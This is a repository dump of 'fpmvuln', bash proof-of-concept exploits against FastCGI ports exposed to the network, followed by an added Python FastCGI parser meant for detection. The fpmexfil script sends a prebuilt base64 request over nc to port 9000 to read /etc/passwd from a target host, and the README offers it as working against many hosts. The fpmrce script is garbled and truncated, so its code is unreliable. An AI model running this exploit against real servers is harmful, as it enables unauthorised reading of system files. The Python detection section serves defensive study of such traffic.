├── LICENSE
├── README.md
├── fpmexfil
└── fpmrce

/LICENSE:
--------------------------------------------------------------------------------
This is free and unencumbered software released into the public domain.

Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.

In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.

For more information, please refer to
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# fpmvuln

Bash PoC scripts that exploit open FastCGI (fpm) ports.

fpmexfil
--------

Tries to exfiltrate /etc/passwd from the target host. Works against many hosts
that expose HHVM on a public interface.

fpmrce
------

Tries to execute PHP code on the remote host. Works against most PHP installations
that expose fpm on a public port.
background
----------

* https://www.openwall.com/lists/oss-security/2019/07/09/2
* https://www.golem.de/news/fpm-sicherheitsluecke-daten-exfiltrieren-mit-facebooks-hhvm-1907-142418.html
* https://hhvm.com/blog/2019/06/10/hhvm-4.9.0.html
* https://www.openwall.com/lists/oss-security/2019/07/27/1

misc
----

There were previous, similar exploits for these issues:

* https://github.com/wofeiwo/webcgi-exploits/blob/master/php/Fastcgi/fcgi_exp.go
* https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
--------------------------------------------------------------------------------

/fpmexfil:
--------------------------------------------------------------------------------
#!/bin/bash

# Tries to exfiltrate /etc/passwd from the target host given as $1.
# The payload is a pre-built FastCGI request (BEGIN_REQUEST, PARAMS, STDIN)
# whose SCRIPT_FILENAME parameter points at /etc/passwd.

[ -z "$1" ] && { echo "usage: $0 <host>" >&2; exit 1; }

payload="AQEAAQAIAAAAAQAAAAAAAAEEAAEARwEACwtTQ1JJUFRfTkFNRS9ldGMvcGFzc3dkDwtTQ1JJUFRfRklMRU5BTUUvZXRjL3Bhc3N3ZA4DUkVRVUVTVF9NRVRIT0RHRVQAAQQAAQAAAAABBQABAAAAAA=="

echo "Trying to exfiltrate /etc/passwd from $1"

# Send the raw request to the FastCGI port (9000 is the PHP-FPM/HHVM default)
# and capture whatever the server answers.
ret="$(echo "$payload" | base64 -d | nc "$1" 9000)"

# A CGI-style header in the reply means a FastCGI server answered.
echo "$ret" | grep -qi "content-type" \
  && echo "Got response, looks like open FPM port"

# A "root:" entry means the reply body is the passwd file itself.
echo "$ret" | grep -q "root:" \
  && echo "Response looks like passwd file, seems we can exfiltrate"

echo
echo "Response:"
echo "$ret"
--------------------------------------------------------------------------------

/fpmrce:
--------------------------------------------------------------------------------
#!/bin/bash

# script will try to execute PHP code on target host

PAYLOAD=" $OUTPUT

grep -q 5253 $OUTPUT
[ $? -eq 0 ] && echo "+++ RCE success with $FN on $HOST, output in $OUTPUT"
done
--------------------------------------------------------------------------------
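To show what the fpmexfil payload actually asks the FastCGI server for, and to give a defender a check that can be run over captured FastCGI traffic, here is an added example in Python (not part of this repository): it parses FastCGI records and the PARAMS name/value pairs, then flags a SCRIPT_FILENAME that resolves outside a document root. The docroot /var/www/html and all function names are assumptions.

```python
import base64, posixpath, struct

# Record types from the FastCGI spec that occur in the fpmexfil payload.
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5

# The base64 request from the fpmexfil script above, decoded once for reuse.
FPMEXFIL_PAYLOAD = ("AQEAAQAIAAAAAQAAAAAAAAEEAAEARwEACwtTQ1JJUFRfTkFNRS9ldGMvcGFzc3dkDwtT"
                    "Q1JJUFRfRklMRU5BTUUvZXRjL3Bhc3N3ZA4DUkVRVUVTVF9NRVRIT0RHRVQAAQQAAQAAAAABBQABAAAAAA==")
PAYLOAD_BYTES = base64.b64decode(FPMEXFIL_PAYLOAD)

def parse_records(data: bytes):
    """Split a stream into (type, request_id, content) tuples (8-byte header: !BBHHBB)."""
    records, off = [], 0
    while off + 8 <= len(data):
        version, rtype, req_id, clen, plen, _ = struct.unpack_from("!BBHHBB", data, off)
        if version != 1:
            raise ValueError(f"unsupported FastCGI version {version} at offset {off}")
        off += 8
        records.append((rtype, req_id, data[off:off + clen]))
        off += clen + plen  # skip content and padding bytes
    return records

def _read_len(buf: bytes, off: int):
    # Name/value lengths are 1 byte when < 128, else 4 bytes with the high bit set.
    if buf[off] < 0x80:
        return buf[off], off + 1
    return struct.unpack_from("!I", buf, off)[0] & 0x7FFFFFFF, off + 4

def parse_params(content: bytes) -> dict:
    """Decode the name/value pairs of one FCGI_PARAMS record."""
    params, off = {}, 0
    while off < len(content):
        nlen, off = _read_len(content, off)
        vlen, off = _read_len(content, off)
        name, off = content[off:off + nlen].decode(), off + nlen
        params[name], off = content[off:off + vlen].decode(), off + vlen
    return params

def request_params(data: bytes) -> dict:
    """Merge all FCGI_PARAMS records of a request into one dict."""
    merged = {}
    for rtype, _, content in parse_records(data):
        if rtype == FCGI_PARAMS:
            merged.update(parse_params(content))
    return merged

def script_outside_docroot(params: dict, docroot: str) -> bool:
    """Detection check: SCRIPT_FILENAME must resolve inside docroot; normpath folds '..'."""
    target = posixpath.normpath(params.get("SCRIPT_FILENAME", ""))
    return not target.startswith(posixpath.normpath(docroot) + "/")
```

`request_params(PAYLOAD_BYTES)` yields the three parameters the script sets (SCRIPT_NAME, SCRIPT_FILENAME, REQUEST_METHOD), and `script_outside_docroot` flags that request for any web root, which is the property a sensor in front of an exposed port 9000 would alert on.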